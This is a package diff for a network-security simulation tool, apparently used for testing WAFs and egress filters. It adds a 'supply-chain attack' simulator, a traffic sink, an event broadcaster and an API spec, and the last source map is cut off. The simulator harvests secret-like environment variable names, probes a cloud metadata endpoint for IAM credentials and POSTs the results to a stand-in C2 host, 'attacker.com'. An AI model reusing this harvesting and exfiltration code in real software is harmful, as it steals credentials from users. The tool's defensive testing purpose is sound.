@atlascrew/apparatus 0.9.0

package/dist/simulator/supply-chain.js

@@ -0,0 +1,67 @@
+import { request } from "undici";
+import { logger } from "../logger.js";
+// Simulate a compromised package behavior
+export async function triggerSupplyChainAttack(c2Target = "http://attacker.com") {
+    const logs = [];
+    const log = (msg) => {
+        logger.warn(`[SupplyChain] ${msg}`);
+        logs.push(`[${new Date().toLocaleTimeString()}] ${msg}`);
+    };
+    log("🚨 MALICIOUS PACKAGE ACTIVATED: 'left-pad-ultra'");
+    // 1. Harvest Environment Variables
+    log("🔍 Harvesting Environment Variables...");
+    const secrets = [];
+    for (const [key, val] of Object.entries(process.env)) {
+        if (key.match(/KEY|SECRET|TOKEN|PASS|PWD/i)) {
+            secrets.push(key);
+        }
+    }
+    log(`✅ Found ${secrets.length} potential secrets: ${secrets.join(", ")}`);
+    // 2. Cloud Credential Access (Imposter)
+    log("☁️  Attempting to steal Cloud Metadata (AWS/GCP)...");
+    try {
+        // Try AWS Imposter (running on 16925 locally)
+        const awsUrl = "http://127.0.0.1:16925/latest/meta-data/iam/security-credentials/";
+        log(`   > GET ${awsUrl}`);
+        const { statusCode, body } = await request(awsUrl);
+        if (statusCode === 200) {
+            const roles = await body.text();
+            log(`⚠️  AWS ROLES DISCOVERED: ${roles.trim()}`);
+            // Go deeper
+            const role = roles.split("\n")[0];
+            if (role) {
+                const credsUrl = `${awsUrl}${role}`;
+                const credsRes = await request(credsUrl);
+                const creds = await credsRes.body.json();
+                log(`🔥 STOLEN AWS CREDS: ${creds.AccessKeyId ?? 'unknown'} (Role: ${role})`);
+            }
+        }
+        else {
+            log("   > AWS Metadata unreachable or locked.");
+        }
+    }
+    catch (e) {
+        log(`   > Metadata Connection Failed: ${e.message}`);
+    }
+    // 3. Exfiltration (Egress)
+    log(`📤 Exfiltrating data to C2: ${c2Target}...`);
+    try {
+        // We simulate a DNS exfil or HTTP POST
+        // DNS simulation:
+        log("   > Trying DNS Tunneling...");
+        // (Skipping actual DNS logic here for simplicity, focusing on HTTP)
+        // HTTP POST
+        log(`   > POST ${c2Target}/upload`);
+        await request(c2Target, {
+            method: "POST",
+            body: JSON.stringify({ secrets, timestamp: Date.now() })
+        }).catch(() => { }); // Fire and forget, we expect it might fail if offline
+        log("✅ Payload sent to network stack (Result depends on Egress Filtering)");
+    }
+    catch (e) {
+        log("❌ Exfiltration Blocked?");
+    }
+    log("💀 Attack Sequence Complete.");
+    return logs;
+}
+//# sourceMappingURL=supply-chain.js.map

package/dist/simulator/supply-chain.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"supply-chain.js","sourceRoot":"","sources":["../../src/simulator/supply-chain.ts"],"names":[],"mappings":"AAAA,OAAO,EAAE,OAAO,EAAE,MAAM,QAAQ,CAAC;AACjC,OAAO,EAAE,MAAM,EAAE,MAAM,cAAc,CAAC;AAEtC,0CAA0C;AAC1C,MAAM,CAAC,KAAK,UAAU,wBAAwB,CAAC,WAAmB,qBAAqB;IACnF,MAAM,IAAI,GAAa,EAAE,CAAC;IAC1B,MAAM,GAAG,GAAG,CAAC,GAAW,EAAE,EAAE;QACxB,MAAM,CAAC,IAAI,CAAC,iBAAiB,GAAG,EAAE,CAAC,CAAC;QACpC,IAAI,CAAC,IAAI,CAAC,IAAI,IAAI,IAAI,EAAE,CAAC,kBAAkB,EAAE,KAAK,GAAG,EAAE,CAAC,CAAC;IAC7D,CAAC,CAAC;IAEF,GAAG,CAAC,kDAAkD,CAAC,CAAC;IAExD,mCAAmC;IACnC,GAAG,CAAC,wCAAwC,CAAC,CAAC;IAC9C,MAAM,OAAO,GAAG,EAAE,CAAC;IACnB,KAAK,MAAM,CAAC,GAAG,EAAE,GAAG,CAAC,IAAI,MAAM,CAAC,OAAO,CAAC,OAAO,CAAC,GAAG,CAAC,EAAE,CAAC;QACnD,IAAI,GAAG,CAAC,KAAK,CAAC,4BAA4B,CAAC,EAAE,CAAC;YAC1C,OAAO,CAAC,IAAI,CAAC,GAAG,CAAC,CAAC;QACtB,CAAC;IACL,CAAC;IACD,GAAG,CAAC,WAAW,OAAO,CAAC,MAAM,uBAAuB,OAAO,CAAC,IAAI,CAAC,IAAI,CAAC,EAAE,CAAC,CAAC;IAE1E,wCAAwC;IACxC,GAAG,CAAC,qDAAqD,CAAC,CAAC;IAC3D,IAAI,CAAC;QACD,8CAA8C;QAC9C,MAAM,MAAM,GAAG,mEAAmE,CAAC;QACnF,GAAG,CAAC,YAAY,MAAM,EAAE,CAAC,CAAC;QAC1B,MAAM,EAAE,UAAU,EAAE,IAAI,EAAE,GAAG,MAAM,OAAO,CAAC,MAAM,CAAC,CAAC;QACnD,IAAI,UAAU,KAAK,GAAG,EAAE,CAAC;YACrB,MAAM,KAAK,GAAG,MAAM,IAAI,CAAC,IAAI,EAAE,CAAC;YAChC,GAAG,CAAC,6BAA6B,KAAK,CAAC,IAAI,EAAE,EAAE,CAAC,CAAC;YAEjD,YAAY;YACZ,MAAM,IAAI,GAAG,KAAK,CAAC,KAAK,CAAC,IAAI,CAAC,CAAC,CAAC,CAAC,CAAC;YAClC,IAAI,IAAI,EAAE,CAAC;gBACP,MAAM,QAAQ,GAAG,GAAG,MAAM,GAAG,IAAI,EAAE,CAAC;gBACpC,MAAM,QAAQ,GAAG,MAAM,OAAO,CAAC,QAAQ,CAAC,CAAC;gBACzC,MAAM,KAAK,GAAG,MAAM,QAAQ,CAAC,IAAI,CAAC,IAAI,EAA8B,CAAC;gBACrE,GAAG,CAAC,wBAAwB,KAAK,CAAC,WAAW,IAAI,SAAS,WAAW,IAAI,GAAG,CAAC,CAAC;YAClF,CAAC;QACL,CAAC;aAAM,CAAC;YACJ,GAAG,CAAC,0CAA0C,CAAC,CAAC;QACpD,CAAC;IACL,CAAC;IAAC,OAAO,CAAM,EAAE,CAAC;QACd,GAAG,CAAC,oCAAoC,CAAC,CAAC,OAAO,EAAE,CAAC,CAAC;IACzD,CAAC;IAED,2BAA2B;IAC3B,GAAG,CAAC,+BAA+B,QAAQ,KAAK,CAAC,CAAC;IAClD,IAAI,CAAC;QACD,uCAAuC;QACvC,kBAAkB;QAClB,GAAG,CAAC,8BAA8B,CAAC,CAAC;QACpC,oEAAoE;QAEpE,YAAY;QACZ,GAAG,CAAC,aAAa,QAAQ,SAAS,CAAC,CAAC;QACpC,MAAM,OAAO,CAAC,QAAQ,EAAE;YACpB,MAAM,EAAE,MAAM;YACd,IAAI,EAAE,IAAI,CAAC,SAAS,CAAC,EAAE,OAAO,EAAE,SAAS,EAAE,IAAI,CAAC,GAAG,EAAE,EAAE,CAAC;SAC3D,CAAC,CAAC,KAAK,CAAC,GAAG,EAAE,GAAE,CAAC,CAAC,CAAC,CAAC,sDAAsD;QAC1E,GAAG,CAAC,sEAAsE,CAAC,CAAC;IAEhF,CAAC;IAAC,OAAO,CAAC,EAAE,CAAC;QACT,GAAG,CAAC,yBAAyB,CAAC,CAAC;IACnC,CAAC;IAED,GAAG,CAAC,8BAA8B,CAAC,CAAC;IACpC,OAAO,IAAI,CAAC;AAChB,CAAC"}

package/dist/sink.js

@@ -0,0 +1,24 @@
+export function sinkHandler(req, res) {
+    let bytesReceived = 0;
+    const start = Date.now();
+    req.on("data", (chunk) => {
+        bytesReceived += chunk.length;
+    });
+    req.on("end", () => {
+        const durationMs = Date.now() - start;
+        const seconds = durationMs / 1000;
+        const mb = bytesReceived / (1024 * 1024);
+        const mbps = seconds > 0 ? (mb * 8) / seconds : 0;
+        res.json({
+            message: "Data consumed and discarded",
+            bytesReceived,
+            durationMs,
+            megabytes: Number(mb.toFixed(2)),
+            mbps: Number(mbps.toFixed(2))
+        });
+    });
+    req.on("error", (err) => {
+        res.status(500).json({ error: "Stream error", details: err.message });
+    });
+}
+//# sourceMappingURL=sink.js.map

package/dist/sink.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"sink.js","sourceRoot":"","sources":["../src/sink.ts"],"names":[],"mappings":"AAEA,MAAM,UAAU,WAAW,CAAC,GAAY,EAAE,GAAa;IACnD,IAAI,aAAa,GAAG,CAAC,CAAC;IACtB,MAAM,KAAK,GAAG,IAAI,CAAC,GAAG,EAAE,CAAC;IAEzB,GAAG,CAAC,EAAE,CAAC,MAAM,EAAE,CAAC,KAAK,EAAE,EAAE;QACrB,aAAa,IAAI,KAAK,CAAC,MAAM,CAAC;IAClC,CAAC,CAAC,CAAC;IAEH,GAAG,CAAC,EAAE,CAAC,KAAK,EAAE,GAAG,EAAE;QACf,MAAM,UAAU,GAAG,IAAI,CAAC,GAAG,EAAE,GAAG,KAAK,CAAC;QACtC,MAAM,OAAO,GAAG,UAAU,GAAG,IAAI,CAAC;QAClC,MAAM,EAAE,GAAG,aAAa,GAAG,CAAC,IAAI,GAAG,IAAI,CAAC,CAAC;QACzC,MAAM,IAAI,GAAG,OAAO,GAAG,CAAC,CAAC,CAAC,CAAC,CAAC,EAAE,GAAG,CAAC,CAAC,GAAG,OAAO,CAAC,CAAC,CAAC,CAAC,CAAC;QAElD,GAAG,CAAC,IAAI,CAAC;YACL,OAAO,EAAE,6BAA6B;YACtC,aAAa;YACb,UAAU;YACV,SAAS,EAAE,MAAM,CAAC,EAAE,CAAC,OAAO,CAAC,CAAC,CAAC,CAAC;YAChC,IAAI,EAAE,MAAM,CAAC,IAAI,CAAC,OAAO,CAAC,CAAC,CAAC,CAAC;SAChC,CAAC,CAAC;IACP,CAAC,CAAC,CAAC;IAEH,GAAG,CAAC,EAAE,CAAC,OAAO,EAAE,CAAC,GAAG,EAAE,EAAE;QACpB,GAAG,CAAC,MAAM,CAAC,GAAG,CAAC,CAAC,IAAI,CAAC,EAAE,KAAK,EAAE,cAAc,EAAE,OAAO,EAAE,GAAG,CAAC,OAAO,EAAE,CAAC,CAAC;IAC1E,CAAC,CAAC,CAAC;AACP,CAAC"}

package/dist/sse-broadcast.js

@@ -0,0 +1,105 @@
+import { EventEmitter } from "events";
+import { randomUUID } from "crypto";
+import { recordDeceptionSignal, recordRequestSignal, recordTarpitSignal } from "./attacker-tracker.js";
+// Configuration
+const MAX_SSE_CLIENTS = 100;
+const HEARTBEAT_INTERVAL_MS = 30000;
+// Global event emitter for SSE
+export class SSEBroadcaster extends EventEmitter {
+    clients = new Map();
+    /**
+     * Registers a new SSE client for receiving broadcast events.
+     * @param res - Express Response object configured for SSE streaming
+     * @returns clientId if added, null if max clients reached
+     */
+    addClient(res) {
+        // Check max client limit (DoS protection)
+        if (this.clients.size >= MAX_SSE_CLIENTS) {
+            return null;
+        }
+        const clientId = randomUUID();
+        // Setup heartbeat to keep connection alive through proxies
+        const heartbeatInterval = setInterval(() => {
+            if (!res.writableEnded) {
+                res.write(`: heartbeat ${new Date().toISOString()}\n\n`);
+            }
+        }, HEARTBEAT_INTERVAL_MS);
+        const clientInfo = {
+            res,
+            clientId,
+            connectedAt: new Date(),
+            heartbeatInterval
+        };
+        this.clients.set(clientId, clientInfo);
+        // Cleanup function for all disconnect scenarios
+        const cleanup = () => {
+            const client = this.clients.get(clientId);
+            if (client) {
+                clearInterval(client.heartbeatInterval);
+                this.clients.delete(clientId);
+            }
+        };
+        // Handle all disconnect scenarios (P0 fix: add error/finish handlers)
+        res.once('close', cleanup);
+        res.once('error', cleanup);
+        res.once('finish', cleanup);
+        // Send connection event
+        this.sendToClient(res, 'health', { status: 'connected', clientId, clients: this.clients.size });
+        return clientId;
+    }
+    sendToClient(res, type, data) {
+        try {
+            if (!res.writableEnded) {
+                // Ensure data has a timestamp for the UI
+                if (typeof data === 'object' && data !== null && !data.timestamp) {
+                    data.timestamp = new Date().toISOString();
+                }
+                // Sanitize JSON to prevent SSE injection via newlines
+                const jsonString = JSON.stringify(data);
+                res.write(`event: ${type}\n`);
+                res.write(`data: ${jsonString}\n\n`);
+            }
+        }
+        catch (e) {
+            // Client disconnected, will be cleaned up by event handlers
+        }
+    }
+    broadcast(type, data) {
+        for (const [, client] of this.clients) {
+            this.sendToClient(client.res, type, data);
+        }
+        // Also emit locally for any internal listeners
+        this.emit(type, { type, data, timestamp: new Date().toISOString() });
+    }
+    getClientCount() {
+        return this.clients.size;
+    }
+    getMaxClients() {
+        return MAX_SSE_CLIENTS;
+    }
+}
+// Singleton instance
+export const sseBroadcaster = new SSEBroadcaster();
+// Convenience functions
+export function broadcastRequest(request) {
+    if (!request.id) {
+        request.id = randomUUID();
+    }
+    recordRequestSignal(request);
+    sseBroadcaster.broadcast('request', request);
+}
+export function broadcastDeception(event) {
+    recordDeceptionSignal(event);
+    sseBroadcaster.broadcast('deception', event);
+}
+export function broadcastTarpit(action, ip) {
+    recordTarpitSignal({ action, ip });
+    sseBroadcaster.broadcast('tarpit', { action, ip });
+}
+export function broadcastHealth(status) {
+    sseBroadcaster.broadcast('health', status);
+}
+export function broadcastWebhook(hookId, data) {
+    sseBroadcaster.broadcast('webhook', { hookId, ...data });
+}
+//# sourceMappingURL=sse-broadcast.js.map

package/dist/sse-broadcast.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"sse-broadcast.js","sourceRoot":"","sources":["../src/sse-broadcast.ts"],"names":[],"mappings":"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"}

package/dist/swagger.js

@@ -0,0 +1,309 @@
+export const swaggerDocument = {
+    "openapi": "3.0.0",
+    "info": {
+        "title": "Tracer (Apparatus) API",
+        "version": "1.0.0",
+        "description": "Universal Network Simulation Platform for testing WAFs, Gateways, and Egress Filters."
+    },
+    "servers": [
+        {
+            "url": "/"
+        }
+    ],
+    "paths": {
+        "/echo": {
+            "get": {
+                "tags": ["Core"],
+                "summary": "Echo Request",
+                "description": "Returns details about the HTTP request.",
+                "parameters": [
+                    {
+                        "in": "query",
+                        "name": "status",
+                        "schema": { "type": "integer", "example": 200 },
+                        "description": "Force a specific HTTP status code response."
+                    },
+                    {
+                        "in": "query",
+                        "name": "delay",
+                        "schema": { "type": "integer", "example": 500 },
+                        "description": "Inject a delay in milliseconds before responding."
+                    }
+                ],
+                "responses": {
+                    "200": { "description": "Successful echo" }
+                }
+            }
+        },
+        "/sysinfo": {
+            "get": {
+                "tags": ["Core"],
+                "summary": "System Information",
+                "description": "Retrieve container environment, OS, and runtime stats.",
+                "responses": {
+                    "200": { "description": "JSON object with system details" }
+                }
+            }
+        },
+        "/dns": {
+            "get": {
+                "tags": ["Infra Debugging"],
+                "summary": "DNS Resolver",
+                "parameters": [
+                    { "in": "query", "name": "target", "required": true, "schema": { "type": "string" }, "description": "Host to resolve" },
+                    { "in": "query", "name": "type", "schema": { "type": "string", "default": "A" }, "description": "Record type (A, AAAA, MX, etc)" }
+                ],
+                "responses": {
+                    "200": { "description": "Resolution results" }
+                }
+            }
+        },
+        "/ping": {
+            "get": {
+                "tags": ["Infra Debugging"],
+                "summary": "TCP Connectivity Check",
+                "parameters": [
+                    { "in": "query", "name": "target", "required": true, "schema": { "type": "string" }, "description": "host:port to test" }
+                ],
+                "responses": {
+                    "200": { "description": "Connection result" }
+                }
+            }
+        },
+        "/hooks/{id}": {
+            "post": {
+                "tags": ["Infra Debugging"],
+                "summary": "Webhook Sink",
+                "parameters": [
+                    { "in": "path", "name": "id", "required": true, "schema": { "type": "string" } }
+                ],
+                "responses": {
+                    "200": { "description": "Webhook received" }
+                }
+            }
+        },
+        "/redteam/validate": {
+            "get": {
+                "tags": ["Security"],
+                "summary": "Red-Team Validation Scan",
+                "description": "Scan a target URL with a library of malicious payloads to test WAF effectiveness.",
+                "parameters": [
+                    { "in": "query", "name": "target", "schema": { "type": "string" }, "description": "Target base URL" },
+                    { "in": "query", "name": "path", "schema": { "type": "string" }, "description": "Target path to hit" }
+                ],
+                "responses": {
+                    "200": { "description": "Validation summary and details" }
+                }
+            }
+        },
+        "/api/redteam/fuzzer/run": {
+            "post": {
+                "tags": ["Security"],
+                "summary": "Execute One Live Fuzzer Request",
+                "description": "Run a single operator-defined request against a target and return normalized response telemetry. Targets are loopback-only unless APPARATUS_FUZZER_ALLOWED_TARGETS is configured.",
+                "requestBody": {
+                    "required": true,
+                    "content": {
+                        "application/json": {
+                            "schema": {
+                                "type": "object",
+                                "properties": {
+                                    "target": { "type": "string", "description": "Base URL. Defaults to current Apparatus host." },
+                                    "path": { "type": "string", "default": "/echo" },
+                                    "method": { "type": "string", "default": "GET" },
+                                    "headers": {
+                                        "type": "object",
+                                        "additionalProperties": { "type": "string" }
+                                    },
+                                    "query": {
+                                        "type": "object",
+                                        "additionalProperties": {
+                                            "oneOf": [{ "type": "string" }, { "type": "number" }, { "type": "boolean" }]
+                                        }
+                                    },
+                                    "body": { "description": "Arbitrary request body forwarded upstream for body-capable methods." },
+                                    "timeoutMs": { "type": "number", "default": 5000 }
+                                }
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "200": {
+                        "description": "Execution metadata and normalized response output",
+                        "content": {
+                            "application/json": {
+                                "schema": {
+                                    "type": "object",
+                                    "properties": {
+                                        "request": {
+                                            "type": "object",
+                                            "properties": {
+                                                "method": { "type": "string" },
+                                                "url": { "type": "string" },
+                                                "timeoutMs": { "type": "number" },
+                                                "hasBody": { "type": "boolean" }
+                                            }
+                                        },
+                                        "response": {
+                                            "type": "object",
+                                            "properties": {
+                                                "status": { "type": "number", "nullable": true },
+                                                "blocked": { "type": "boolean" },
+                                                "durationMs": { "type": "number" },
+                                                "headers": { "type": "object", "additionalProperties": { "type": "string" } },
+                                                "bodyBytes": { "type": "number", "description": "Bytes observed before capture limits are applied." },
+                                                "bodyPreview": { "type": "string" },
+                                                "bodyTruncated": { "type": "boolean" },
+                                                "error": { "type": "string" },
+                                                "errorCode": { "type": "string" }
+                                            }
+                                        }
+                                    }
+                                }
+                            }
+                        }
+                    },
+                    "400": {
+                        "description": "Invalid request payload",
+                        "content": {
+                            "application/json": {
+                                "schema": {
+                                    "type": "object",
+                                    "properties": {
+                                        "error": { "type": "string" }
+                                    }
+                                }
+                            }
+                        }
+                    },
+                    "403": { "description": "Security gate blocked non-local request origin" }
+                }
+            }
+        },
+        "/sentinel/rules": {
+            "get": {
+                "tags": ["Defense"],
+                "summary": "List Active Shield Rules",
+                "responses": { "200": { "description": "List of active rules" } }
+            },
+            "post": {
+                "tags": ["Defense"],
+                "summary": "Add Active Shield Rule",
+                "requestBody": {
+                    "content": {
+                        "application/json": {
+                            "schema": {
+                                "type": "object",
+                                "properties": {
+                                    "pattern": { "type": "string" },
+                                    "action": { "type": "string", "enum": ["block", "log"] }
+                                }
+                            }
+                        }
+                    }
+                },
+                "responses": { "200": { "description": "Rule added" } }
+            }
+        },
+        "/mtd": {
+            "post": {
+                "tags": ["Defense"],
+                "summary": "Rotate MTD Prefix",
+                "requestBody": {
+                    "content": {
+                        "application/json": {
+                            "schema": {
+                                "type": "object",
+                                "properties": { "prefix": { "type": "string" } }
+                            }
+                        }
+                    }
+                },
+                "responses": { "200": { "description": "Prefix rotated" } }
+            }
+        },
+        "/dlp": {
+            "get": {
+                "tags": ["Security"],
+                "summary": "Data Loss Prevention Simulator",
+                "parameters": [
+                    { "in": "query", "name": "type", "schema": { "type": "string", "enum": ["cc", "ssn", "email", "sql"] } }
+                ],
+                "responses": { "200": { "description": "Fake sensitive data" } }
+            }
+        },
+        "/ghosts": {
+            "get": {
+                "tags": ["Advanced Logic"],
+                "summary": "Behavioral Ghost Traffic",
+                "description": "Start or stop background traffic generation to simulate user activity.",
+                "parameters": [
+                    { "in": "query", "name": "action", "schema": { "type": "string", "enum": ["start", "stop"] }, "description": "Action to perform" },
+                    { "in": "query", "name": "target", "schema": { "type": "string" }, "description": "Target base URL (default: localhost)" },
+                    { "in": "query", "name": "delay", "schema": { "type": "integer", "default": 1000 }, "description": "Delay between requests in ms" }
+                ],
+                "responses": {
+                    "200": { "description": "Status of ghost traffic" }
+                }
+            }
+        },
+        "/script": {
+            "post": {
+                "tags": ["Advanced Logic"],
+                "summary": "Execute JS Script",
+                "description": "Run safe JavaScript code in a sandbox (vm). Timeout: 100ms.",
+                "requestBody": {
+                    "content": {
+                        "application/json": {
+                            "schema": {
+                                "type": "object",
+                                "required": ["code"],
+                                "properties": {
+                                    "code": { "type": "string", "example": "result = input.a + input.b;" },
+                                    "input": { "type": "object", "example": { "a": 1, "b": 2 } }
+                                }
+                            }
+                        }
+                    }
+                },
+                "responses": {
+                    "200": { "description": "Execution result and logs" }
+                }
+            }
+        },
+        "/kv/{key}": {
+            "get": {
+                "tags": ["Advanced Logic"],
+                "summary": "Get KV Value",
+                "parameters": [
+                    { "in": "path", "name": "key", "required": true, "schema": { "type": "string" } }
+                ],
+                "responses": {
+                    "200": { "description": "Value found" },
+                    "404": { "description": "Key not found" }
+                }
+            },
+            "put": {
+                "tags": ["Advanced Logic"],
+                "summary": "Set KV Value",
+                "parameters": [
+                    { "in": "path", "name": "key", "required": true, "schema": { "type": "string" } }
+                ],
+                "requestBody": {
+                    "content": { "application/json": { "schema": { "type": "object" } } }
+                },
+                "responses": { "200": { "description": "Value set" } }
+            },
+            "delete": {
+                "tags": ["Advanced Logic"],
+                "summary": "Delete KV Value",
+                "parameters": [
+                    { "in": "path", "name": "key", "required": true, "schema": { "type": "string" } }
+                ],
+                "responses": { "204": { "description": "Value deleted" } }
+            }
+        }
+    }
+};
+//# sourceMappingURL=swagger.js.map

package/dist/swagger.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"swagger.js","sourceRoot":"","sources":["../src/swagger.ts"],"names":[],"mappings":"AAAA,MAAM,CAAC,MAAM,eAAe,GAAG;IAC7B,SAAS,EAAE,OAAO;IAClB,MAAM,EAAE;QACN,OAAO,EAAE,wBAAwB;QACjC,SAAS,EAAE,OAAO;QAClB,aAAa,EAAE,uFAAuF;KACvG;IACD,SAAS,EAAE;QACT;YACE,KAAK,EAAE,GAAG;SACX;KACF;IACD,OAAO,EAAE;QACP,OAAO,EAAE;YACP,KAAK,EAAE;gBACL,MAAM,EAAE,CAAC,MAAM,CAAC;gBAChB,SAAS,EAAE,cAAc;gBACzB,aAAa,EAAE,yCAAyC;gBACxD,YAAY,EAAE;oBACZ;wBACE,IAAI,EAAE,OAAO;wBACb,MAAM,EAAE,QAAQ;wBAChB,QAAQ,EAAE,EAAE,MAAM,EAAE,SAAS,EAAE,SAAS,EAAE,GAAG,EAAE;wBAC/C,aAAa,EAAE,6CAA6C;qBAC7D;oBACD;wBACE,IAAI,EAAE,OAAO;wBACb,MAAM,EAAE,OAAO;wBACf,QAAQ,EAAE,EAAE,MAAM,EAAE,SAAS,EAAE,SAAS,EAAE,GAAG,EAAE;wBAC/C,aAAa,EAAE,mDAAmD;qBACnE;iBACF;gBACD,WAAW,EAAE;oBACX,KAAK,EAAE,EAAE,aAAa,EAAE,iBAAiB,EAAE;iBAC5C;aACF;SACF;QACD,UAAU,EAAE;YACV,KAAK,EAAE;gBACL,MAAM,EAAE,CAAC,MAAM,CAAC;gBAChB,SAAS,EAAE,oBAAoB;gBAC/B,aAAa,EAAE,wDAAwD;gBACvE,WAAW,EAAE;oBACX,KAAK,EAAE,EAAE,aAAa,EAAE,iCAAiC,EAAE;iBAC5D;aACF;SACF;QACD,MAAM,EAAE;YACN,KAAK,EAAE;gBACL,MAAM,EAAE,CAAC,iBAAiB,CAAC;gBAC3B,SAAS,EAAE,cAAc;gBACzB,YAAY,EAAE;oBACZ,EAAE,IAAI,EAAE,OAAO,EAAE,MAAM,EAAE,QAAQ,EAAE,UAAU,EAAE,IAAI,EAAE,QAAQ,EAAE,EAAE,MAAM,EAAE,QAAQ,EAAE,EAAE,aAAa,EAAE,iBAAi